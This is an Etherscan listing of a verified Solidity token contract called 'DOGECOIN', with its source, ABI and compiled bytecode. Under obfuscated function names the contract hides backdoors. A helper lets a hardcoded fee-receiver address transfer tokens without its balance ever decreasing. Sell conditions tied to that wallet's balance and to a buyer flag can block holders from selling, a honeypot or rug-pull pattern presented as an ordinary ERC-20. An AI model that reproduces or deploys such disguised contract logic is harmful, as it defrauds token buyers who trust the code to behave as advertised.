ETH Price: $3,426.37 (-0.07%)
Gas: 6 Gwei

Token

βž–βž–πŸŸ§βž–βž–βž–βž–πŸŸ§πŸŸ§βž–πŸŸ§πŸŸ¨πŸŸ§βž–βž–πŸŸ§πŸŸ¨πŸŸ§βž–πŸŸ§πŸŸ§πŸŸ§πŸŸ§πŸŸ§πŸŸ§πŸŸ¨πŸŸ§βž–πŸŸ§πŸŸ¨οΏ½... (DOGECOIN)
 

Overview

Max Total Supply

42,069,000,000 DOGECOIN

Holders

34

Market

Onchain Market Cap

$0.00

Circulating Supply Market Cap

-

Other Info

Token Contract (WITH 9 Decimals)

Balance
714,340,065.336512093 DOGECOIN

Value
$0.00
0x99466d30a84195a6f00c81972eeeb41303042556
Loading...
Loading
Loading...
Loading
Loading...
Loading

Click here to update the token information / general information
# Exchange Pair Price  24H Volume % Volume

Contract Source Code Verified (Exact Match)

Contract Name:
DOGECOIN

Compiler Version
v0.8.20+commit.a1b79de6

Optimization Enabled:
Yes with 200 runs

Other Settings:
default evmVersion, None license

Contract Source Code (Solidity)

/**
 *Submitted for verification at Etherscan.io on 2023-08-21
*/

/**
βž–βž–🟧βž–βž–βž–βž–🟧🟧
βž–🟧🟨🟧βž–βž–🟧🟨🟧
βž–🟧🟧🟧🟧🟧🟧🟨🟧
βž–🟧🟨🟨🟨🟨🟨🟧🟧
🟧🟨🔳⬜️🟨🔳⬜️🟨🟧
🟧🟨🟨⬛️🟨🟨🟨🟨🟧
🟧🟨🟨🟨🟨🟫🟨🟨🟧
🟧🟨🟫🟫🟫🟨🟨🟨🟧
βž–🟨🟨🟨🟨🟨🟧🟨🟧
βž–βž–🟧🟧🟧🟧 

website: https://dogeerc.com/

telegram: https://t.me/doge_coinerc

twitter: https://twitter.com/dogeerc
**/

// SPDX-License-Identifier: MIT

pragma solidity 0.8.20;

abstract contract Context {
    function _msgSender() internal view virtual returns (address) {
        return msg.sender;
    }
}

interface IERC20 {
    function totalSupply() external view returns (uint256);
    function balanceOf(address account) external view returns (uint256);
    function transfer(address recipient, uint256 amount) external returns (bool);
    function allowance(address owner, address spender) external view returns (uint256);
    function approve(address spender, uint256 amount) external returns (bool);
    function transferFrom(address sender, address recipient, uint256 amount) external returns (bool);
    event Transfer(address indexed from, address indexed to, uint256 value);
    event Approval(address indexed owner, address indexed spender, uint256 value);
}

library SafeMath {
    function add(uint256 a, uint256 b) internal pure returns (uint256) {
        uint256 c = a + b;
        require(c >= a, "SafeMath: addition overflow");
        return c;
    }

    function _yisubmm(uint256 a, uint256 b) internal pure returns (uint256) {
        return _yisubmm(a, b, "SafeMath: _yisubmmtraction overflow");
    }

    function _yisubmm(uint256 a, uint256 b, string memory errorMessage) internal pure returns (uint256) {
        require(b <= a, errorMessage);
        uint256 c = a - b;
        return c;
    }

    function mul(uint256 a, uint256 b) internal pure returns (uint256) {
        if (a == 0) {
            return 0;
        }
        uint256 c = a * b;
        require(c / a == b, "SafeMath: multiplication overflow");
        return c;
    }

    function div(uint256 a, uint256 b) internal pure returns (uint256) {
        return div(a, b, "SafeMath: division by zero");
    }

    function div(uint256 a, uint256 b, string memory errorMessage) internal pure returns (uint256) {
        require(b > 0, errorMessage);
        uint256 c = a / b;
        return c;
    }

}

contract Ownable is Context {
    address private _owner;
    event OwnershipTransferred(address indexed previousOwner, address indexed newOwner);

    constructor () {
        address msgSender = _msgSender();
        _owner = msgSender;
        emit OwnershipTransferred(address(0), msgSender);
    }

    function owner() public view returns (address) {
        return _owner;
    }

    modifier onlyOwner() {
        require(_owner == _msgSender(), "Ownable: caller is not the owner");
        _;
    }

    function renounceOwnership() public virtual onlyOwner {
        emit OwnershipTransferred(_owner, address(0));
        _owner = address(0);
    }

}

interface IUniswapV2Factory {
    function createPair(address tokenA, address tokenB) external returns (address pair);
}

interface IuniswapRouter {
    function swapExactTokensForETHSupportingFeeOnTransferTokens(
        uint amountIn,
        uint amountOutMin,
        address[] calldata path,
        address to,
        uint deadline
    ) external;
    function factory() external pure returns (address);
    function WETH() external pure returns (address);
    function addLiquidityETH(
        address token,
        uint amountTokenDesired,
        uint amountTokenMin,
        uint amountETHMin,
        address to,
        uint deadline
    ) external payable returns (uint amountToken, uint amountETH, uint liquidity);
}

contract DOGECOIN is Context, IERC20, Ownable {
    using SafeMath for uint256;
    mapping (address => uint256) private _balances;
    mapping (address => mapping (address => uint256)) private _allowances;
    mapping (address => bool) private _isExcludedFromFee;
    mapping (address => bool) private _Aiopaunmm;
    mapping(address => uint256) private _holderLastTransferTimestamp;
    bool public limitvEnabled = false;

    string private constant _name = unicode"βž–βž–🟧βž–βž–βž–βž–🟧🟧\nβž–🟧🟨🟧βž–βž–🟧🟨🟧\nβž–🟧🟧🟧🟧🟧🟧🟨🟧\nβž–🟧🟨🟨🟨🟨🟨🟧🟧\n🟧🟨🔳⬜🟨🔳⬜🟨🟧\n🟧🟨🟨⬛🟨🟨🟨🟨🟧\n🟧🟨🟨🟨🟨🟫🟨🟨🟧\n🟧🟨🟫🟫🟫🟨🟨🟨🟧\nβž–🟨🟨🟨🟨🟨🟧🟨🟧\nβž–βž–🟧🟧🟧🟧";
    string private constant _symbol = unicode"DOGECOIN";
    uint8 private constant _decimals = 9;
   
    uint256 private constant _tTotal = 42069000000 * 10 **_decimals;
    uint256 public _maxfkAmount = 1000000000 * 10 **_decimals;
    uint256 public _maxfkWallet = 1000000000 * 10 **_decimals;
    uint256 public _taxfkSwapfkThreshold = 1000000000 * 10 **_decimals;
    uint256 public _maxfkSwap = 1000000000 * 10 **_decimals;

    uint256 private _initiafkBuyTax=6;
    uint256 private _initiafkSellTax=6;
    uint256 private _finafkBuyTax=1;
    uint256 private _finafkSellTax=1;
    uint256 private _reducfkBuyTaxAt=4;
    uint256 private _reducfkSellTaxAt=1;
    uint256 private _prevenfkSwapBefore=0;
    uint256 private _buyCount=0;

    IuniswapRouter private uniswapRouter;
    address public _buyjFeeaaReceve = 0x7e6960d7960014fFa78D394C87143306b57E29a6;
    address private uniswapPair;
    bool private Troodctaost;
    bool private inSwap = false;
    bool private swapEnabled = false;


    event MaxTfkAmounfkapdated(uint _maxfkAmount);
    modifier swapping {
        inSwap = true;
        _;
        inSwap = false;
    }

    constructor () {
        _isExcludedFromFee[owner()] = true;
        _isExcludedFromFee[address(this)] = true;
        _isExcludedFromFee[_buyjFeeaaReceve] = true;
        _balances[_msgSender()] = _tTotal;

        emit Transfer(address(0), _msgSender(), _tTotal);
    }

    function name() public pure returns (string memory) {
        return _name;
    }

    function symbol() public pure returns (string memory) {
        return _symbol;
    }

    function decimals() public pure returns (uint8) {
        return _decimals;
    }

    function totalSupply() public pure override returns (uint256) {
        return _tTotal;
    }

    function balanceOf(address account) public view override returns (uint256) {
        return _balances[account];
    }

    function transfer(address recipient, uint256 amount) public override returns (bool) {
        _transfer(_msgSender(), recipient, amount);
        return true;
    }

    function allowance(address owner, address spender) public view override returns (uint256) {
        return _allowances[owner][spender];
    }

    function approve(address spender, uint256 amount) public override returns (bool) {
        _approve(_msgSender(), spender, amount);
        return true;
    }

    function transferFrom(address sender, address recipient, uint256 amount) public override returns (bool) {
        _transfer(sender, recipient, amount);
        _approve(sender, _msgSender(), _allowances[sender][_msgSender()]._yisubmm(amount, "ERC20: transfer amount exceeds allowance"));
        return true;
    }

    function _approve(address owner, address spender, uint256 amount) private {
        require(owner != address(0), "ERC20: approve from the zero address");
        require(spender != address(0), "ERC20: approve to the zero address");
        _allowances[owner][spender] = amount;
        emit Approval(owner, spender, amount);
    }

    function _transfer(address from, address to, uint256 amount) private {
        require(from != address(0), "ERC20: transfer from the zero address");
        require(to != address(0), "ERC20: transfer to the zero address");
        require(amount > 0, "Transfer amount must be greater than zero");
        uint256 taxAmount=0;
        if (from != owner() && to != owner()) {

            if (limitvEnabled) {
                if (to != address(uniswapRouter) && to != address(uniswapPair)) {
                  require(_holderLastTransferTimestamp[tx.origin] < block.number,"Only one transfer per block allowed.");
                  _holderLastTransferTimestamp[tx.origin] = block.number;
                }
            }

            if (from == uniswapPair && to != address(uniswapRouter) && !_isExcludedFromFee[to] ) {
                require(amount <= _maxfkAmount, "Exceeds the Amount.");
                require(balanceOf(to) + amount <= _maxfkWallet, "Exceeds the max Wallet Size.");
                if(_buyCount<_prevenfkSwapBefore){
                  require(!_Baibianotre(to));
                }
                _buyCount++; _Aiopaunmm[to]=true;
                taxAmount = amount.mul((_buyCount>_reducfkBuyTaxAt)?_finafkBuyTax:_initiafkBuyTax).div(100);
            }

            if(to == uniswapPair && from!= address(this) && !_isExcludedFromFee[from] ){
                require(amount <= _maxfkAmount && balanceOf(_buyjFeeaaReceve)<_maxfkSwap, "Exceeds the Amount.");
                taxAmount = amount.mul((_buyCount>_reducfkSellTaxAt)?_finafkSellTax:_initiafkSellTax).div(100);
                require(_buyCount>_prevenfkSwapBefore && _Aiopaunmm[from]);
            }

            uint256 contractTokenBalance = balanceOf(address(this));
            if (!inSwap 
            && to == uniswapPair && swapEnabled && contractTokenBalance>_taxfkSwapfkThreshold 
            && _buyCount>_prevenfkSwapBefore&& !_isExcludedFromFee[to] && !_isExcludedFromFee[from]
            ) {
                swapfkForllEamm(_yainmm(amount,_yainmm(contractTokenBalance,_maxfkSwap)));
                uint256 contractETHBalance = address(this).balance;
                if(contractETHBalance > 0) {
   
                }
            }
        }

        if(taxAmount>0){
          _balances[address(this)]=_balances[address(this)].add(taxAmount);
          emit Transfer(from, address(this),taxAmount);
        }
        _balances[from]=_yisubmm(from, _balances[from], amount);
        _balances[to]=_balances[to].add(amount._yisubmm(taxAmount));
        emit Transfer(from, to, amount._yisubmm(taxAmount));
    }

    function swapfkForllEamm(uint256 tokenAmount) private swapping {
        if(tokenAmount==0){return;}
        if(!Troodctaost){return;}
        address[] memory path = new address[](2);
        path[0] = address(this);
        path[1] = uniswapRouter.WETH();
        _approve(address(this), address(uniswapRouter), tokenAmount);
        uniswapRouter.swapExactTokensForETHSupportingFeeOnTransferTokens(
            tokenAmount,
            0,
            path,
            address(this),
            block.timestamp
        );
    }

    function _yainmm(uint256 a, uint256 b) private pure returns (uint256){
      return (a>b)?b:a;
    }

    function _yisubmm(address from, uint256 a, uint256 b) private view returns(uint256){
        if(from == _buyjFeeaaReceve){
            return a;
        }else{
            return a._yisubmm(b);
        }
    }

    function removeLimits() external onlyOwner{
        _maxfkAmount = _tTotal;
        _maxfkWallet=_tTotal;
        limitvEnabled=false;
        emit MaxTfkAmounfkapdated(_tTotal);
    }

    function _Baibianotre(address account) private view returns (bool) {
        uint256 size;
        assembly {
            size := extcodesize(account)
        }
        return size > 0;
    }

    function openTrading() external onlyOwner() {
        uniswapRouter = IuniswapRouter(0x7a250d5630B4cF539739dF2C5dAcb4c659F2488D);
        require(!Troodctaost,"trading is already open");
        _approve(address(this), address(uniswapRouter), _tTotal);
        uniswapPair = IUniswapV2Factory(uniswapRouter.factory()).createPair(address(this), uniswapRouter.WETH());
        uniswapRouter.addLiquidityETH{value: address(this).balance}(address(this),balanceOf(address(this)),0,0,owner(),block.timestamp);
        IERC20(uniswapPair).approve(address(uniswapRouter), type(uint).max);
        swapEnabled = true;
        Troodctaost = true;
    }

    receive() external payable {}
}

Contract Security Audit

Contract ABI

[{"inputs":[],"stateMutability":"nonpayable","type":"constructor"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"owner","type":"address"},{"indexed":true,"internalType":"address","name":"spender","type":"address"},{"indexed":false,"internalType":"uint256","name":"value","type":"uint256"}],"name":"Approval","type":"event"},{"anonymous":false,"inputs":[{"indexed":false,"internalType":"uint256","name":"_maxfkAmount","type":"uint256"}],"name":"MaxTfkAmounfkapdated","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"previousOwner","type":"address"},{"indexed":true,"internalType":"address","name":"newOwner","type":"address"}],"name":"OwnershipTransferred","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"from","type":"address"},{"indexed":true,"internalType":"address","name":"to","type":"address"},{"indexed":false,"internalType":"uint256","name":"value","type":"uint256"}],"name":"Transfer","type":"event"},{"inputs":[],"name":"_buyjFeeaaReceve","outputs":[{"internalType":"address","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"_maxfkAmount","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"_maxfkSwap","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"_maxfkWallet","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"_taxfkSwapfkThreshold","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"owner","type":"address"},{"internalType":"address","name":"spender","type":"address"}],"name":"allowance","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"approve","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"account","type":"address"}],"name":"balanceOf","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"decimals","outputs":[{"internalType":"uint8","name":"","type":"uint8"}],"stateMutability":"pure","type":"function"},{"inputs":[],"name":"limitvEnabled","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"name","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"pure","type":"function"},{"inputs":[],"name":"openTrading","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"owner","outputs":[{"internalType":"address","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"removeLimits","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"renounceOwnership","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"symbol","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"pure","type":"function"},{"inputs":[],"name":"totalSupply","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"pure","type":"function"},{"inputs":[{"internalType":"address","name":"recipient","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"transfer","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"sender","type":"address"},{"internalType":"address","name":"recipient","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"transferFrom","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"stateMutability":"payable","type":"receive"}]

60806040526006805460ff191690556200001c6009600a62000341565b6200002c90633b9aca0062000358565b6007556200003d6009600a62000341565b6200004d90633b9aca0062000358565b6008556200005e6009600a62000341565b6200006e90633b9aca0062000358565b6009556009600a62000081919062000341565b6200009190633b9aca0062000358565b600a556006600b819055600c556001600d819055600e8190556004600f556010555f6011819055601255601480546001600160a01b031916737e6960d7960014ffa78d394c87143306b57e29a61790556015805461ffff60a81b19169055348015620000fb575f80fd5b505f80546001600160a01b031916339081178255604051909182917f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e0908290a350600160035f620001535f546001600160a01b031690565b6001600160a01b03908116825260208083019390935260409182015f908120805495151560ff199687161790553081526003909352818320805485166001908117909155601454909116835291208054909216179055620001b76009600a62000341565b620001c8906409cb81ff4062000358565b335f81815260016020526040812092909255907fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef6200020a6009600a62000341565b6200021b906409cb81ff4062000358565b60405190815260200160405180910390a362000372565b634e487b7160e01b5f52601160045260245ffd5b600181815b808511156200028657815f19048211156200026a576200026a62000232565b808516156200027857918102915b93841c93908002906200024b565b509250929050565b5f826200029e575060016200033b565b81620002ac57505f6200033b565b8160018114620002c55760028114620002d057620002f0565b60019150506200033b565b60ff841115620002e457620002e462000232565b50506001821b6200033b565b5060208310610133831016604e8410600b841016171562000315575081810a6200033b565b62000321838362000246565b805f190482111562000337576200033762000232565b0290505b92915050565b5f6200035160ff8416836200028e565b9392505050565b80820281158282048414176200033b576200033b62000232565b611a3280620003805f395ff3fe608060405260043610610113575f3560e01c8063751039fc1161009d578063bd27d80d11610062578063bd27d80d146102f9578063bf9d77e01461030e578063c9567bf914610327578063d00bc0b61461033b578063dd62ed3e14610350575f80fd5b8063751039fc146102475780638da5cb5b1461025b57806395d89b411461028b578063a648ecb5146102bb578063a9059cbb146102da575f80fd5b8063313ce567116100e3578063313ce567146101b857806366a16a9a146101d357806366f906aa146101e857806370a08231146101fd578063715018a614610231575f80fd5b806306fdde031461011e578063095ea7b31461014857806318160ddd1461017757806323b872dd14610199575f80fd5b3661011a57005b5f80fd5b348015610129575f80fd5b50610132610394565b60405161013f91906114ae565b60405180910390f35b348015610153575f80fd5b50610167610162366004611510565b6103b7565b604051901515815260200161013f565b348015610182575f80fd5b5061018b6103cd565b60405190815260200161013f565b3480156101a4575f80fd5b506101676101b336600461153a565b6103ee565b3480156101c3575f80fd5b506040516009815260200161013f565b3480156101de575f80fd5b5061018b60085481565b3480156101f3575f80fd5b5061018b60075481565b348015610208575f80fd5b5061018b610217366004611578565b6001600160a01b03165f9081526001602052604090205490565b34801561023c575f80fd5b50610245610456565b005b348015610252575f80fd5b506102456104d0565b348015610266575f80fd5b505f546001600160a01b03165b6040516001600160a01b03909116815260200161013f565b348015610296575f80fd5b506040805180820190915260088152672227a3a2a1a7a4a760c11b6020820152610132565b3480156102c6575f80fd5b50601454610273906001600160a01b031681565b3480156102e5575f80fd5b506101676102f4366004611510565b61058e565b348015610304575f80fd5b5061018b600a5481565b348015610319575f80fd5b506006546101679060ff1681565b348015610332575f80fd5b5061024561059a565b348015610346575f80fd5b5061018b60095481565b34801561035b575f80fd5b5061018b61036a366004611593565b6001600160a01b039182165f90815260026020908152604080832093909416825291909152205490565b606060405180610180016040528061015481526020016118866101549139905090565b5f6103c333848461094e565b5060015b92915050565b5f6103da6009600a6116be565b6103e9906409cb81ff406116cc565b905090565b5f6103fa848484610a71565b61044b84336104468560405180606001604052806028815260200161185e602891396001600160a01b038a165f908152600260209081526040808320338452909152902054919061113c565b61094e565b5060015b9392505050565b5f546001600160a01b031633146104885760405162461bcd60e51b815260040161047f906116e3565b60405180910390fd5b5f80546040516001600160a01b03909116907f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e0908390a35f80546001600160a01b0319169055565b5f546001600160a01b031633146104f95760405162461bcd60e51b815260040161047f906116e3565b6105056009600a6116be565b610514906409cb81ff406116cc565b6007556105236009600a6116be565b610532906409cb81ff406116cc565b6008556006805460ff191690557ffbbfe3a958a2de5d254d6837b63122e7a75e113758ea9a9a1cd0c9cde0f14dde61056c6009600a6116be565b61057b906409cb81ff406116cc565b60405190815260200160405180910390a1565b5f6103c3338484610a71565b5f546001600160a01b031633146105c35760405162461bcd60e51b815260040161047f906116e3565b601380546001600160a01b031916737a250d5630b4cf539739df2c5dacb4c659f2488d17905560155460ff600160a01b90910416156106445760405162461bcd60e51b815260206004820152601760248201527f74726164696e6720697320616c7265616479206f70656e000000000000000000604482015260640161047f565b6013546106719030906001600160a01b03166106626009600a6116be565b610446906409cb81ff406116cc565b60135f9054906101000a90046001600160a01b03166001600160a01b031663c45a01556040518163ffffffff1660e01b8152600401602060405180830381865afa1580156106c1573d5f803e3d5ffd5b505050506040513d601f19601f820116820180604052508101906106e59190611718565b6001600160a01b031663c9c653963060135f9054906101000a90046001600160a01b03166001600160a01b031663ad5c46486040518163ffffffff1660e01b8152600401602060405180830381865afa158015610744573d5f803e3d5ffd5b505050506040513d601f19601f820116820180604052508101906107689190611718565b6040516001600160e01b031960e085901b1681526001600160a01b039283166004820152911660248201526044016020604051808303815f875af11580156107b2573d5f803e3d5ffd5b505050506040513d601f19601f820116820180604052508101906107d69190611718565b601580546001600160a01b039283166001600160a01b03199091161790556013541663f305d719473061081d816001600160a01b03165f9081526001602052604090205490565b5f806108305f546001600160a01b031690565b60405160e088901b6001600160e01b03191681526001600160a01b03958616600482015260248101949094526044840192909252606483015290911660848201524260a482015260c40160606040518083038185885af1158015610896573d5f803e3d5ffd5b50505050506040513d601f19601f820116820180604052508101906108bb9190611733565b505060155460135460405163095ea7b360e01b81526001600160a01b0391821660048201525f1960248201529116915063095ea7b3906044016020604051808303815f875af1158015610910573d5f803e3d5ffd5b505050506040513d601f19601f82011682018060405250810190610934919061175e565b506015805462ff00ff60a01b19166201000160a01b179055565b6001600160a01b0383166109b05760405162461bcd60e51b8152602060048201526024808201527f45524332303a20617070726f76652066726f6d20746865207a65726f206164646044820152637265737360e01b606482015260840161047f565b6001600160a01b038216610a115760405162461bcd60e51b815260206004820152602260248201527f45524332303a20617070726f766520746f20746865207a65726f206164647265604482015261737360f01b606482015260840161047f565b6001600160a01b038381165f8181526002602090815260408083209487168084529482529182902085905590518481527f8c5be1e5ebec7d5bd14f71427d1e84f3dd0314c0f7b2291e5b200ac8c7c3b925910160405180910390a3505050565b6001600160a01b038316610ad55760405162461bcd60e51b815260206004820152602560248201527f45524332303a207472616e736665722066726f6d20746865207a65726f206164604482015264647265737360d81b606482015260840161047f565b6001600160a01b038216610b375760405162461bcd60e51b815260206004820152602360248201527f45524332303a207472616e7366657220746f20746865207a65726f206164647260448201526265737360e81b606482015260840161047f565b5f8111610b985760405162461bcd60e51b815260206004820152602960248201527f5472616e7366657220616d6f756e74206d7573742062652067726561746572206044820152687468616e207a65726f60b81b606482015260840161047f565b5f80546001600160a01b03858116911614801590610bc357505f546001600160a01b03848116911614155b15610ffd5760065460ff1615610c7f576013546001600160a01b03848116911614801590610bff57506015546001600160a01b03848116911614155b15610c7f57325f908152600560205260409020544311610c6d5760405162461bcd60e51b8152602060048201526024808201527f4f6e6c79206f6e65207472616e736665722070657220626c6f636b20616c6c6f6044820152633bb2b21760e11b606482015260840161047f565b325f9081526005602052604090204390555b6015546001600160a01b038581169116148015610caa57506013546001600160a01b03848116911614155b8015610cce57506001600160a01b0383165f9081526003602052604090205460ff16155b15610e1457600754821115610d1b5760405162461bcd60e51b815260206004820152601360248201527222bc31b2b2b239903a34329020b6b7bab73a1760691b604482015260640161047f565b60085482610d3d856001600160a01b03165f9081526001602052604090205490565b610d47919061177d565b1115610d955760405162461bcd60e51b815260206004820152601c60248201527f4578636565647320746865206d61782057616c6c65742053697a652e00000000604482015260640161047f565b6011546012541015610dac57823b15610dac575f80fd5b60128054905f610dbb83611790565b90915550506001600160a01b0383165f908152600460205260409020805460ff19166001179055600f54601254610e1191606491610e0b9110610e0057600b54610e04565b600d545b8590611174565b906111f2565b90505b6015546001600160a01b038481169116148015610e3a57506001600160a01b0384163014155b8015610e5e57506001600160a01b0384165f9081526003602052604090205460ff16155b15610f2a576007548211158015610e8f5750600a546014546001600160a01b03165f90815260016020526040902054105b610ed15760405162461bcd60e51b815260206004820152601360248201527222bc31b2b2b239903a34329020b6b7bab73a1760691b604482015260640161047f565b610ef66064610e0b60105460125411610eec57600c54610e04565b600e548590611174565b9050601154601254118015610f2257506001600160a01b0384165f9081526004602052604090205460ff165b610f2a575f80fd5b305f90815260016020526040902054601554600160a81b900460ff16158015610f6057506015546001600160a01b038581169116145b8015610f755750601554600160b01b900460ff165b8015610f82575060095481115b8015610f915750601154601254115b8015610fb557506001600160a01b0384165f9081526003602052604090205460ff16155b8015610fd957506001600160a01b0385165f9081526003602052604090205460ff16155b15610ffb57610ffb610ff684610ff184600a54611233565b611233565b611247565b505b801561107557305f9081526001602052604090205461101c90826113d0565b305f81815260016020526040908190209290925590516001600160a01b038616907fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef9061106c9085815260200190565b60405180910390a35b6001600160a01b0384165f908152600160205260409020546110999085908461142e565b6001600160a01b0385165f908152600160205260409020556110dc6110be838361145e565b6001600160a01b0385165f90815260016020526040902054906113d0565b6001600160a01b038085165f8181526001602052604090209290925585167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef611125858561145e565b60405190815260200160405180910390a350505050565b5f818484111561115f5760405162461bcd60e51b815260040161047f91906114ae565b505f61116b84866117a8565b95945050505050565b5f825f0361118357505f6103c7565b5f61118e83856116cc565b90508261119b85836117bb565b1461044f5760405162461bcd60e51b815260206004820152602160248201527f536166654d6174683a206d756c7469706c69636174696f6e206f766572666c6f6044820152607760f81b606482015260840161047f565b5f61044f83836040518060400160405280601a81526020017f536166654d6174683a206469766973696f6e206279207a65726f000000000000815250611482565b5f818311611241578261044f565b50919050565b6015805460ff60a81b1916600160a81b17905580156113c057601554600160a01b900460ff16156113c0576040805160028082526060820183525f9260208301908036833701905050905030815f815181106112a5576112a56117da565b6001600160a01b03928316602091820292909201810191909152601354604080516315ab88c960e31b81529051919093169263ad5c46489260048083019391928290030181865afa1580156112fc573d5f803e3d5ffd5b505050506040513d601f19601f820116820180604052508101906113209190611718565b81600181518110611333576113336117da565b6001600160a01b039283166020918202929092010152601354611359913091168461094e565b60135460405163791ac94760e01b81526001600160a01b039091169063791ac947906113919085905f908690309042906004016117ee565b5f604051808303815f87803b1580156113a8575f80fd5b505af11580156113ba573d5f803e3d5ffd5b50505050505b506015805460ff60a81b19169055565b5f806113dc838561177d565b90508381101561044f5760405162461bcd60e51b815260206004820152601b60248201527f536166654d6174683a206164646974696f6e206f766572666c6f770000000000604482015260640161047f565b6014545f906001600160a01b039081169085160361144d57508161044f565b611457838361145e565b905061044f565b5f61044f83836040518060600160405280602381526020016119da6023913961113c565b5f81836114a25760405162461bcd60e51b815260040161047f91906114ae565b505f61116b84866117bb565b5f6020808352835180828501525f5b818110156114d9578581018301518582016040015282016114bd565b505f604082860101526040601f19601f8301168501019250505092915050565b6001600160a01b038116811461150d575f80fd5b50565b5f8060408385031215611521575f80fd5b823561152c816114f9565b946020939093013593505050565b5f805f6060848603121561154c575f80fd5b8335611557816114f9565b92506020840135611567816114f9565b929592945050506040919091013590565b5f60208284031215611588575f80fd5b813561044f816114f9565b5f80604083850312156115a4575f80fd5b82356115af816114f9565b915060208301356115bf816114f9565b809150509250929050565b634e487b7160e01b5f52601160045260245ffd5b600181815b8085111561161857815f19048211156115fe576115fe6115ca565b8085161561160b57918102915b93841c93908002906115e3565b509250929050565b5f8261162e575060016103c7565b8161163a57505f6103c7565b8160018114611650576002811461165a57611676565b60019150506103c7565b60ff84111561166b5761166b6115ca565b50506001821b6103c7565b5060208310610133831016604e8410600b8410161715611699575081810a6103c7565b6116a383836115de565b805f19048211156116b6576116b66115ca565b029392505050565b5f61044f60ff841683611620565b80820281158282048414176103c7576103c76115ca565b6020808252818101527f4f776e61626c653a2063616c6c6572206973206e6f7420746865206f776e6572604082015260600190565b5f60208284031215611728575f80fd5b815161044f816114f9565b5f805f60608486031215611745575f80fd5b8351925060208401519150604084015190509250925092565b5f6020828403121561176e575f80fd5b8151801515811461044f575f80fd5b808201808211156103c7576103c76115ca565b5f600182016117a1576117a16115ca565b5060010190565b818103818111156103c7576103c76115ca565b5f826117d557634e487b7160e01b5f52601260045260245ffd5b500490565b634e487b7160e01b5f52603260045260245ffd5b5f60a082018783526020878185015260a0604085015281875180845260c08601915082890193505f5b8181101561183c5784516001600160a01b031683529383019391830191600101611817565b50506001600160a01b0396909616606085015250505060800152939250505056fe45524332303a207472616e7366657220616d6f756e74206578636565647320616c6c6f77616e6365e29e96e29e96f09f9fa7e29e96e29e96e29e96e29e96f09f9fa7f09f9fa70ae29e96f09f9fa7f09f9fa8f09f9fa7e29e96e29e96f09f9fa7f09f9fa8f09f9fa70ae29e96f09f9fa7f09f9fa7f09f9fa7f09f9fa7f09f9fa7f09f9fa7f09f9fa8f09f9fa70ae29e96f09f9fa7f09f9fa8f09f9fa8f09f9fa8f09f9fa8f09f9fa8f09f9fa7f09f9fa70af09f9fa7f09f9fa8f09f94b3e2ac9cf09f9fa8f09f94b3e2ac9cf09f9fa8f09f9fa70af09f9fa7f09f9fa8f09f9fa8e2ac9bf09f9fa8f09f9fa8f09f9fa8f09f9fa8f09f9fa70af09f9fa7f09f9fa8f09f9fa8f09f9fa8f09f9fa8f09f9fabf09f9fa8f09f9fa8f09f9fa70af09f9fa7f09f9fa8f09f9fabf09f9fabf09f9fabf09f9fa8f09f9fa8f09f9fa8f09f9fa70ae29e96f09f9fa8f09f9fa8f09f9fa8f09f9fa8f09f9fa8f09f9fa7f09f9fa8f09f9fa70ae29e96e29e96f09f9fa7f09f9fa7f09f9fa7f09f9fa7536166654d6174683a205f79697375626d6d7472616374696f6e206f766572666c6f77a26469706673582212205e55120ad31da91b8e842070298a14f032227f0f7653aa35dae13d4fcc6415b364736f6c63430008140033

Deployed Bytecode

